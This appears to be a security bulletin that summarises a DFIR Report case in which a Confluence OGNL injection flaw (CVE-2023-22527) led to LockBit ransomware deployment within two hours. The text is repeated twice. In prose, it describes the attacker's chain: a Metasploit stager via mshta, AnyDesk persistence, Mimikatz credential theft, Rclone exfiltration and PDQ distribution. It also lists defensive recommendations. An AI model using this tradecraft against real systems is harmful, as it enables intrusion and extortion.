Confluence Exploit Leads to LockBit Ransomware
Summary:
Researchers at DFIR Report have uncovered details of an intrusion where LockBit ransomware was deployed by a threat actor within 2 hours of gaining initial access. The intrusion initiated with the compromise of an exposed Windows Confluence server that was vulnerable to critical a server-side template injection vulnerability in Confluence. Tracked as CVE-2023-22527, the flaw can enable unauthenticated actors to execute arbitrary commands on the target server by injecting Object-Graph Navigation Language (OGNL) expressions.
The first commands executed by the threat actor, 'net user' and 'whoami,' were used to enumerate user accounts and gather information about the affected user. The actor then employed mshta, a native Windows utility, to retrieve and execute a Metasploit stager, establishing command and control with the Metasploit server. Anydesk was installed for persistent access, and a new user, "backup," was created and added to the local "Administrator" group. This allowed the actor to remotely access the beachhead host via RDP, using a proxy connection through the Metasploit payload, and execute Mimikatz.
The execution of Mimikatz helped the actor identify an easily crackable hash for the ‘Administrator’ account on the beachhead, with researchers noting that the password was re-used across the hosts in the environment. This account was further used to facilitate lateral movement across the network and exfiltrate data of interest using tools like Rclone. From here, the actor was observed accessing domain controller, enumerating admin group memberships, and using PDQ, a legitimate enterprise deployment tool, to distribute LockBit ransomware to multiple systems via SMB.
Security Officer Comments:
The rapid deployment of ransomware within just two hours of gaining initial access underscores the increasing sophistication and efficiency of modern threat actors. This swift execution reflects a well-coordinated and automated attack strategy, where attackers can quickly move from exploitation to full system compromise, minimizing the chances of detection or response. Such fast-paced operations demonstrate a high level of preparation and a deep understanding of target environments, allowing threat actors to inflict maximum damage in a short timeframe. This trend emphasizes the need for robust defenses and rapid incident response capabilities to mitigate the impact of such attacks.
Suggested Corrections:
Backup your data, system images, and configurations, regularly test them, and keep the backups offline: Ensure that backups are regularly tested and that they are not connected to the business network, as many ransomware variants try to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems.
Update and patch systems promptly: This includes maintaining the security of operating systems, applications, and firmware in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to drive your patch management program.
Test your incident response plan: There's nothing that shows the gaps in plans more than testing them. Run through some core questions and use those to build an incident response plan: Are you able to sustain business operations without access to certain systems? For how long? Would you turn off your manufacturing operations if business systems such as billing were offline?
Check Your Security Team's Work: Use a 3rd party pen tester to test the security of your systems and your ability to defend against a sophisticated attack. Many ransomware criminals are aggressive and sophisticated and will find the equivalent of unlocked doors.
Segment your networks: There's been a recent shift in ransomware attacks – from stealing data to disrupting operations. It's critically important that your corporate business functions and manufacturing/production operations are separated and that you carefully filter and limit internet access to operational networks, identify links between these networks, and develop workarounds or manual controls to ensure ICS networks can be isolated and continue operating if your corporate network is compromised. Regularly test contingency plans such as manual controls so that safety-critical functions can be maintained during a cyber incident.
Train employees:
Email remains the most vulnerable attack vector for organizations. Users should be trained on how to avoid and spot phishing emails. Multi-factor authentication can help prevent malicious access to sensitive services.
Link(s):
https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/#initial-access
Researchers at DFIR Report have uncovered details of an intrusion where LockBit ransomware was deployed by a threat actor within 2 hours of gaining initial access. The intrusion initiated with the compromise of an exposed Windows Confluence server that was vulnerable to critical a server-side template injection vulnerability in Confluence. Tracked as CVE-2023-22527, the flaw can enable unauthenticated actors to execute arbitrary commands on the target server by injecting Object-Graph Navigation Language (OGNL) expressions.
The first commands executed by the threat actor, 'net user' and 'whoami,' were used to enumerate user accounts and gather information about the affected user. The actor then employed mshta, a native Windows utility, to retrieve and execute a Metasploit stager, establishing command and control with the Metasploit server. Anydesk was installed for persistent access, and a new user, "backup," was created and added to the local "Administrator" group. This allowed the actor to remotely access the beachhead host via RDP, using a proxy connection through the Metasploit payload, and execute Mimikatz.
The execution of Mimikatz helped the actor identify an easily crackable hash for the ‘Administrator’ account on the beachhead, with researchers noting that the password was re-used across the hosts in the environment. This account was further used to facilitate lateral movement across the network and exfiltrate data of interest using tools like Rclone. From here, the actor was observed accessing domain controller, enumerating admin group memberships, and using PDQ, a legitimate enterprise deployment tool, to distribute LockBit ransomware to multiple systems via SMB.
Security Officer Comments:
The rapid deployment of ransomware within just two hours of gaining initial access underscores the increasing sophistication and efficiency of modern threat actors. This swift execution reflects a well-coordinated and automated attack strategy, where attackers can quickly move from exploitation to full system compromise, minimizing the chances of detection or response. Such fast-paced operations demonstrate a high level of preparation and a deep understanding of target environments, allowing threat actors to inflict maximum damage in a short timeframe. This trend emphasizes the need for robust defenses and rapid incident response capabilities to mitigate the impact of such attacks.
Suggested Corrections:
Backup your data, system images, and configurations, regularly test them, and keep the backups offline: Ensure that backups are regularly tested and that they are not connected to the business network, as many ransomware variants try to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems.
Update and patch systems promptly: This includes maintaining the security of operating systems, applications, and firmware in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to drive your patch management program.
Test your incident response plan: There's nothing that shows the gaps in plans more than testing them. Run through some core questions and use those to build an incident response plan: Are you able to sustain business operations without access to certain systems? For how long? Would you turn off your manufacturing operations if business systems such as billing were offline?
Check Your Security Team's Work: Use a 3rd party pen tester to test the security of your systems and your ability to defend against a sophisticated attack. Many ransomware criminals are aggressive and sophisticated and will find the equivalent of unlocked doors.
Segment your networks: There's been a recent shift in ransomware attacks – from stealing data to disrupting operations. It's critically important that your corporate business functions and manufacturing/production operations are separated and that you carefully filter and limit internet access to operational networks, identify links between these networks, and develop workarounds or manual controls to ensure ICS networks can be isolated and continue operating if your corporate network is compromised. Regularly test contingency plans such as manual controls so that safety-critical functions can be maintained during a cyber incident.
Train employees:
Email remains the most vulnerable attack vector for organizations. Users should be trained on how to avoid and spot phishing emails. Multi-factor authentication can help prevent malicious access to sensitive services.
Link(s):
https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/#initial-access